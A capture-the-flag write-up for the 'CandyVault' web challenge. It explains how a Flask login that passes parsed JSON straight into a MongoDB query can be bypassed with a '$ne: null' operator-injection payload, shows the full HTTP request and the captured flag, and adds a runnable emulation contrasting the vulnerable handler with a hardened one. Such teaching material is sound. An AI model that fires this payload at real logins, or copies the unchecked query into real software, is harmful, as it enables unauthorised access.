CandyVault
Challenge Description
The malevolent spirits have concealed all the Halloween treats within their secret vault, and it’s imperative that you decipher its enigmatic seal to reclaim the candy before the spooky night arrives.
Category: Web
Difficulty: Very Easy
Solution
Reviewing the application source, the login function is the only part that matters for the challenge:
challenge/application/app.py
# Excerpt from the challenge's app.py; app and users_collection (the MongoDB
# collection of users) are defined earlier in the same file.
from flask import request, jsonify, render_template, redirect

@app.route("/login", methods=["POST"])
def login():
    content_type = request.headers.get("Content-Type")
    if content_type == "application/x-www-form-urlencoded":
        # Form values are always strings.
        email = request.form.get("email")
        password = request.form.get("password")
    elif content_type == "application/json":
        # JSON values are used exactly as parsed, so an object such as
        # {"$ne": null} reaches MongoDB as an operator expression.
        data = request.get_json()
        email = data.get("email")
        password = data.get("password")
    else:
        return jsonify({"error": "Unsupported Content-Type"}), 400

    # Both values go into the filter document without any type check.
    user = users_collection.find_one({"email": email, "password": password})
    if user:
        return render_template("candy.html", flag=open("flag.txt").read())
    else:
        return redirect("/")
The function takes two values, email and password, and the application stores users in MongoDB. The form-encoded branch only ever yields strings, but the JSON branch passes whatever request.get_json() parsed, nested objects included, straight into find_one. That lets us replace the expected strings with query operators and bypass the login using the classic NoSQL operator-injection payload (see References):

{"email": {"$ne": null}, "password": {"$ne": null}}

find_one then matches the first document whose email and password are both non-null, which is any user, and the handler renders the flag. Sending the payload with Content-Type: application/json returns the flag:
POST /login HTTP/1.1
Host: 94.237.55.96:35207
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 51
Origin: http://94.237.55.96:35207
Connection: keep-alive
Referer: http://94.237.55.96:35207/
Upgrade-Insecure-Requests: 1
Priority: u=0, i
{"email": {"$ne": null}, "password": {"$ne": null}}
The response is the rendered candy.html containing the flag:

HTB{s4y_h1_t0_th3_c4andy_v4u1t!}
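To show why the operator payload matches and how the handler could be hardened, here is an added example that is not part of the challenge source. It emulates only the MongoDB behaviour needed here ($eq and $ne over an in-memory list) so it runs without a database; the user document, the request bodies and the hardened login_hardened variant (a string type check plus $eq) are constructed for this illustration and are not the challenge's own code.

```python
"""Added example: NoSQL operator injection against a login filter like
CandyVault's, and one way to harden it. The in-memory matcher emulates only
the MongoDB operators used here ($eq, $ne); everything below is constructed
for illustration, not taken from the challenge."""
import json

# Constructed sample collection: one user whose credentials are unknown to us.
USERS = [{"email": "ghost@candyvault.htb", "password": "s3cr3t"}]


def match_field(value, cond):
    """Evaluate one field condition the way MongoDB does for the two operators
    this example needs: a plain value is an equality test, a dict is an
    operator expression such as {"$ne": None} or {"$eq": "x"}."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$eq":
            if value != arg:
                return False
        elif op == "$ne":
            if value == arg:
                return False
        else:
            raise ValueError(f"operator {op} not emulated in this example")
    return True


def find_one(collection, query):
    """Minimal stand-in for collection.find_one(query)."""
    for doc in collection:
        if all(match_field(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """Mirrors the challenge's JSON branch: parsed values go straight into the
    filter, so attacker-supplied operator objects are honoured."""
    data = json.loads(body)
    email = data.get("email")
    password = data.get("password")
    return find_one(USERS, {"email": email, "password": password}) is not None


def login_hardened(body):
    """Same flow, but credentials must be strings (objects, lists and null are
    rejected before any query) and $eq pins the comparison to equality."""
    data = json.loads(body)
    email = data.get("email")
    password = data.get("password")
    if not isinstance(email, str) or not isinstance(password, str):
        return False
    query = {"email": {"$eq": email}, "password": {"$eq": password}}
    return find_one(USERS, query) is not None


# Constructed request bodies: the bypass payload and an ordinary wrong guess.
PAYLOAD = '{"email": {"$ne": null}, "password": {"$ne": null}}'
WRONG_GUESS = '{"email": "ghost@candyvault.htb", "password": "wrong"}'
VALID_LOGIN = '{"email": "ghost@candyvault.htb", "password": "s3cr3t"}'

if __name__ == "__main__":
    print("vulnerable + payload :", login_vulnerable(PAYLOAD))   # True
    print("vulnerable + guess   :", login_vulnerable(WRONG_GUESS))  # False
    print("hardened + payload   :", login_hardened(PAYLOAD))     # False
    print("hardened + valid     :", login_hardened(VALID_LOGIN))  # True
```

The payload succeeds against login_vulnerable because {"$ne": null} is true for every stored email and password, so the first user in the collection matches. The type check in login_hardened is the decisive fix: once only strings reach the filter, there is no way to smuggle an operator, and $eq is belt-and-braces on top of that.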
References
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection